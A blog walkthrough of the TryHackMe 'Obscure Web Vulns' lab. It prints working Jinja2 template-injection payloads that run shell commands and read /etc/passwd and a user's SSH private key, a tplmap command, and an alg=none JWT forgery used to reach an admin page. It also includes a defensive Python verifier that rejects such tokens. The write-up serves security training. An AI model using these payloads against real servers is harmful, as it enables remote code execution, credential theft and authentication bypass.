Obscure Web Vulns

October 7, 2020

This post is a walkthrough for the TryHackMe room ZTH: Obscure Web Vulns. I highly recommend having PayloadsAllTheThings open while doing this room, or just keeping it in your toolkit.

https://github.com/swisskyrepo/PayloadsAllTheThings/

TASK 1 – 3

Just read, and click the button to complete.

TASK 4: Manual exploitation of SSTI

4.0: “How would a hacker(you) cat out /etc/passwd on the server(using cat with the rce payload)”

{{config.__class__.__init__.__globals__['os'].popen('cat /etc/passwd').read()}}

4.1: “What about reading in the contents of the user test’s private ssh key.(use the read file one not the rce one)”

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/home/test/.ssh/id_rsa').read() }}

TASK 5: Automatic Exploitation of SSTI

5.0: “How would I cat out /etc/passwd using tplmap on the ip:port combo 10.10.10.10:5000, with the vulnerable param “noot”.”

tplmap -u http://10.10.10.10:5000/ -d 'noot' --os-cmd "cat /etc/passwd"

TASK 6: Challenge

6.0: For this flag I found it easiest to combine ls and cat with the payload from the earlier tasks. We can see here that we are in /home/para.

{{config.__class__.__init__.__globals__['os'].popen('cat /etc/passwd').read()}}

Once I entered this in the search bar, it gave me a list of parent-level directories.

{{config.__class__.__init__.__globals__['os'].popen('ls ../').read()}}

I then changed the command slightly so I could cat the file out.

{{config.__class__.__init__.__globals__['os'].popen('cat ../flag').read()}}

Here is our flag!

TASK 7 – 8

Just read, and click the button to complete.

Task 9: CSRF: Automatic Exploitation

--malicious

TASK 10 – 13

Just read, and click the button to complete.

Task 14: JWT: Challenge!

Having the PayloadsAllTheThings page "JWT – JSON Web Token" open while reading here was helpful. Task 12 also explains this very well.

TASK 15 – 17

Just read, and click the button to complete.

TASK 18: JWT: Challenge

This task was a little frustrating because https://jwt.io/ would not let me edit the header part of the JWT without the header completely disappearing. So what I ended up doing was grabbing the header from Task 16, since I knew we would use HS256 and JWT for the challenge.

HS256 Header: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0

(In the first picture you can see my algorithm set to none; whenever I tried to make an edit, the header would completely vanish.)

Original
Copied Header

I then used the Firefox developer tools to swap out my JWT. Once I had replaced my current token with the new one, I was greeted with an admin page.
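As an added example (not code from the room or from this post), here is a minimal Python verifier that shows why the header swap above works and how a server defends against it: it decodes the header captured above and only accepts a token whose algorithm is on the server's own allow-list and whose HMAC verifies, so a token carrying alg=none is rejected. The secret key and the claims are constructed values for the demo.

```python
import base64
import hashlib
import hmac
import json

# Demo secret (constructed for this example); a real service loads it from config.
KEY = b"room-demo-secret"

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    # JWT segments drop the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def make_hs256_token(claims: dict, key: bytes) -> str:
    """Issue a token the way the server would (HS256 over header.payload)."""
    header = b64url_encode(b'{"typ":"JWT","alg":"HS256"}')
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"

def verify_jwt(token: str, key: bytes, allowed_algs=("HS256",)):
    """Return (claims, None) if the token verifies, else (None, reason)."""
    parts = token.split(".")
    if len(parts) != 3:
        return None, "malformed token"
    header_b64, body_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
    except ValueError:
        return None, "bad header"
    alg = header.get("alg") if isinstance(header, dict) else None
    # The fix for the alg=none trick: enforce the server's allow-list and
    # never let the untrusted token choose how it is verified.
    if alg not in allowed_algs:
        return None, f"algorithm {alg!r} not allowed"
    expected = hmac.new(key, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None, "bad signature"
    return json.loads(b64url_decode(body_b64)), None

# The header captured in the post, followed by a constructed payload and an
# empty signature: the token shape that a verifier honouring alg=none accepts.
NONE_HEADER = "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0"
NONE_TOKEN = NONE_HEADER + "." + b64url_encode(b'{"username":"admin"}') + "."

def decoded_none_header() -> dict:
    return json.loads(b64url_decode(NONE_HEADER))
```

Decoding the captured header gives {"typ":"JWT","alg":"none"}, which is what jwt.io was showing as the algorithm in the screenshot.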

TASK 19 – 21

Just read, and click the button to complete.

TASK 22: XXE: Challenge

22.0: How many users are on the system?

31

22.1: What is the name of the user with a UID of 1000?

para

Follow Task 20 here; it does a great job of explaining this, along with PayloadsAllTheThings. Burp Suite is also helpful here.

XXE revealing information about the server.

TASK 23 – 24

Just read, and click the button to complete.

TASK 25: Bonus Section: Challenge

First, get jwt-cracker

npm install --global jwt-cracker

Next, input the token the same way Task 24 does: token, alphabet, and length.

TASK 26: Credits

Read and celebrate.
